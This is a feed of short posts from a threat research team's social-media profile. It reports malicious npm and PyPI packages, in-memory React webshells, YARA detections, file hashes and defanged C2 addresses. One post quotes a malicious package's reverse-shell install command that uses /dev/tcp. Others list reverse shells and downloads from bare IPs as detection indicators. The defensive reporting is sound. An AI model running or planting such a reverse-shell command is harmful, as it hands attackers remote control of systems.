Nextron Research ⚡️
@nextronresearch
Followers: 2K | Following: 148 | Media: 64 | Statuses: 183
Nextron Systems Threat Research Team research (att) https://t.co/QTt2X62dXP
Frankfurt, Germany
Joined October 2024
We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries,
Generic detection rules FTW 🙌 The post-exploitation activity @wiz_io showed yesterday makes these scripts light up like a Christmas tree🎄: bash reverse shells, crypto miner indicators, history resets, wget/curl from http to bare IPs, base64 decoding, etc. If you keep your
This pretty much sums up the situation: an in-memory (!) JavaScript-based (!) webshell gets implanted into a vulnerable React server with a single(!) POST request and leaves zero(!) trace in logs or on disk. Someone used that POC, successfully injected the shell and still
It’s wild how little sticks around when someone hits a server with the #React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process
You may not have noticed and I didn’t even want to bother people with it earlier today, but I pushed a set of YARA rules that pick up memory traces from the published RSC exploitation chains. If someone hit your exposed React/Next.js instance with one of the public PoCs, these
We’ve been digging through the #React RCE mess for two days now, trying to get at least some visibility into what’s going on out there. None of this is easy to detect, and most signals vanish in memory before you can even look at them. My teammate @_swachchhanda_ put together a
'payload_1.ps1' looks like #NetSupport @abuse_ch https://t.co/E663Nqk6TB URLs (Russia): hxxp://80.64.19(.)114/fakeurl.htm hxxp://80.64.19(.)114:443/fakeurl.htm 3 AV and 8 THOR comments @nextronresearch
FUD 'kryo_crypted_0ow5ljsy.bat' @abuse_ch https://t.co/siJgg2NLkg FUD with 2 @nextronresearch comments @skocherhan
We @nextronresearch scan many public repos like npm, pypi, vscode marketplace etc. And we find a lot of shitty malware :) Example: https://t.co/YwUVVxUXiG SHA256: 79cc98d0831e7b6a191000ec997ebc1853b1f6cc1190dbb855b97d7bf418c287 #PyPi
Malicious NPM package imitating expressjs/multer. It downloads payload from Google Firebase Storage. https://t.co/406XOvSoeY SHA-256: 3d3ebabe63cc6128194440210bffbafeac95c9a23bf294711a8637aa857b3648 #NPM #Google @nextronresearch
'kryo_crypted_fgow4o24.bat' @abuse_ch https://t.co/irfMnbhI6q 9 AV but 9 THOR comments @nextronresearch @skocherhan
FUD 'syn.bat' @abuse_ch https://t.co/DOvNEPtGNF 0 AV and 1 @thor_scanner comment @nextronresearch @skocherhan
Follow-up on yesterday’s VS Code extension case: we finished the malware analysis of the Rust implants: Solana-based C2, AES-encrypted JS stages, and a Google Calendar fallback channel with invisible Unicode tricks. Write-up is here https://t.co/7ICrh2BEaE by @marius_benthin
NPM package "baidu-src-test*" spawning reverse shell on installation via (pre)install script. sh -i >& /dev/tcp/43[.]160[.]194[.]214/53 0>&1 https://t.co/kwAPdFm4GS @nextronresearch #NPM #THOR
FUD 'ihrewq.ps1' seen from Denmark and Russia @abuse_ch https://t.co/3lOSIqDQ6G 3 @nextronresearch comments. Original URL: hxxps://62.60.226(.)251/downloads/ihrewq.ps1
The SHA1-Hulud npm mess keeps growing, so we added additional detections for it today - new YARA rules by my colleague @marius_benthin in our public signature-base - cover bun_environment.js / setup_bun.js and the malicious preinstall script variants from the Wiz / Aikido
Link: github.com – YARA signature and IOC database for my scanners and tools - Neo23x0/signature-base
We used to fight worms on the OS level. Slammer, Blaster, Conficker... all that stuff. Now we get the same behaviour one layer up, inside the software ecosystems we trust every day: NPM tokens, transitive deps, weak account hygiene, zero visibility… and suddenly a
In August 2024 this "libmupdf.dll" sample was uploaded to VT from Mexico: ec5d14ca011ba8c12f4d51b0d463cf51051feaf1655c7f709dce3ffa625dfcf6 Today, for some reason, someone rescanned it. And now the sample is detected by ESET as NukeSped (meaning Lazarus). And with the rescan also
FUD 'Cli_____________ent.bat' seen from the UK @abuse_ch https://t.co/TsIsndShmT C2: 208.91.189(.)183:4449 (TCP) Only 1 THOR YARA hit @nextronresearch